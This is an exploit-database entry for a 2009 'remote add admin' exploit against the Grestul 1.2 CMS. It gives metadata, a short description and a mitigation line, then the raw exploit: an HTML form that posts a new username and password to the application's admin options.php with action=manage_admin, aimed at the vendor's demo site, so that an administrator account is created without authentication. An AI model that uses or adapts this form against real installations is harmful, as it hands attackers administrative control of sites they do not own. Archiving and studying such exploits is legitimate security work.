Grestul 1.2 Remote add admin exploit

vendor:

Grestul 1.2

by:

ThE g0bL!N

9,3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Grestul 1.2

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: YES

Related CWE: N/A

CPE: a:grestul:grestul:1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Grestul 1.2 Remote add admin exploit

A vulnerability in Grestul 1.2 allows an attacker to remotely add an admin user to the system. This is done by sending a POST request to the options.php page with the username and password of the new admin user. This vulnerability is due to insufficient input validation and authentication checks.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

Grestul 1.2 Remote add admin exploit
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://grestul.com/
Note: Algerie 3-1 Egypt

code
-----
<form method="post" name="add_admin" id="add_admin" action="http://grestul.com/demo/admin/options.php?action=manage_admin">
  <label for="username_new" class="label_newpage">Username:</label><br /><input type="text" name="username_new" id="username_new" class="input_newpage" value="" />
  <br /><br /><label for="password" class="label_newpage">New Password:</label><br /><input type="password" name="password" id="password" class="input_newpage" value="" />
  <br /><br /><label for="con_password" class="label_newpage">Confirm Password:</label><br /><input type="password" name="con_password" id="con_password" class="input_newpage" value="" />
  <br /><input type="submit" name="add_admin" id="add_admin" value="Add Admin" class="submit_newpage" />
  </form></div>
---------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-08]